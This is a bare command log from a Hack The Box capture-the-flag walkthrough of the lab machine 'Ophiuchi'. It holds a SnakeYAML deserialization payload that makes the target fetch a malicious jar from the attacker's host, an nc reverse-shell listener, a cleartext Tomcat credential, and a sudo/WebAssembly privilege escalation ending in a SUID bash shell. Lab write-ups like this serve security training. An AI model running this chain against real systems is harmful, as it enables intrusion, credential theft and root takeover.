Ophiuchi
HTB Linux
nmap -A -p- -oA ophiuchi 10.129.152.152 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152
nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152
nikto -h 10.129.152.152:80


whatweb http://10.129.152.152


git clone https://github.com/artsploit/yaml-payload

tree -fs

nmap -p8080 10.129.152.152 --script http-enum -oN webScan
http://10.129.152.152:8080/manager

cat src/artsploit/AwesomeScriptEngineFactory.java

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

python3 -m http.server 80
nc -lvnp 443
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [“http://10.10.14.20/yaml-payload.jar”] ]] ]

cat /opt/tomcat/conf/tomcat-users.xml
Credenciales-> admin:whythereisalimit

su admin

sudo -l

cd /tmp
ls -l /opt/wasm-functions
cat /opt/wasm-functions/index.go

cp /opt/wasm-functions/main.wasm .
touch deploy.sh
ls -l /bin/bash
vim deploy.sh
sudo /usr/bin/go run /opt/wasm-functions/index.go

git clone --recursive https://github.com/WebAssembly/wabt

cd wabt
git submodule update --init
mkdir build
cmake ..

cmake --build .

python3 -m http.server 8082
wget http://10.129.152.152:8082/main.wasm

./wasm2wat ../../main.wasm
./wasm2wat ../../main.wasm > main.wat
cat main.wat

rm main.wasm
./wat2wasm main.wat > main.wasm

python3 -m http.server 80
cd tmp
wget http://10.10.14.26/main.wasm

chmod +x main.wasm
ls -l /bin/bash
cat deploy.sh
ls -l /bin/bash
bash -p
